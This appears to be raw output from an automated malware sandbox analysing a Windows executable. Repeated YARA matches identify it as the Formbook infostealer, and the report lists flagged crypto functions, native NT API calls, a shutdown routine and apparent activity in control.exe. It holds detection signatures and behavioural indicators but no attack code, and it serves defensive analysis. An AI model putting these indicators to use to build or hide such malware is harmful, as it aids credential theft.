Source: Yara match File source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: 5tCYPTkM6b.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_00403225
Detected potential crypto function
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_0040604C 0_2_0040604C
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_00404772 0_2_00404772
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_021E0A3A 0_2_021E0A3A
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_0041C8C5 2_2_0041C8C5
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_0041B8F3 2_2_0041B8F3
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_0041C134 2_2_0041C134
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_0041D2AE 2_2_0041D2AE
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00408C8B 2_2_00408C8B
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00408C90 2_2_00408C90
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_0041CF5F 2_2_0041CF5F
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009DB090 2_2_009DB090
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A81002 2_2_00A81002
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009CF900 2_2_009CF900
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009E4120 2_2_009E4120
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009FEBB0 2_2_009FEBB0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C0D20 2_2_009C0D20
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A91D55 2_2_00A91D55
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009E6E30 2_2_009E6E30
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0441D466 14_2_0441D466
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0436841F 14_2_0436841F
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04350D20 14_2_04350D20
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04421D55 14_2_04421D55
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04422D07 14_2_04422D07
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_044225DD 14_2_044225DD
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04382581 14_2_04382581
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0436D5E0 14_2_0436D5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04376E30 14_2_04376E30
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0441D616 14_2_0441D616
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04422EF7 14_2_04422EF7
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04421FF1 14_2_04421FF1
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411002 14_2_04411002
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043820A0 14_2_043820A0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0436B090 14_2_0436B090
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_044228EC 14_2_044228EC
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_044220A8 14_2_044220A8
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04374120 14_2_04374120
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435F900 14_2_0435F900
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_044222AE 14_2_044222AE
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04422B28 14_2_04422B28
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438EBB0 14_2_0438EBB0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0441DBD2 14_2_0441DBD2
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001EC8C5 14_2_001EC8C5
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001D8C90 14_2_001D8C90
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001D8C8B 14_2_001D8C8B
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001D2D90 14_2_001D2D90
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001D2FB0 14_2_001D2FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 0435B150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_004185F0 NtCreateFile, 2_2_004185F0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_004186A0 NtReadFile, 2_2_004186A0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00418720 NtClose, 2_2_00418720
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_004187D0 NtAllocateVirtualMemory, 2_2_004187D0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_004185EA NtCreateFile, 2_2_004185EA
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_00A098F0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_00A09860
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09840 NtDelayExecution,LdrInitializeThunk, 2_2_00A09840
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A099A0 NtCreateSection,LdrInitializeThunk, 2_2_00A099A0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_00A09910
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09A20 NtResumeThread,LdrInitializeThunk, 2_2_00A09A20
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_00A09A00
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09A50 NtCreateFile,LdrInitializeThunk, 2_2_00A09A50
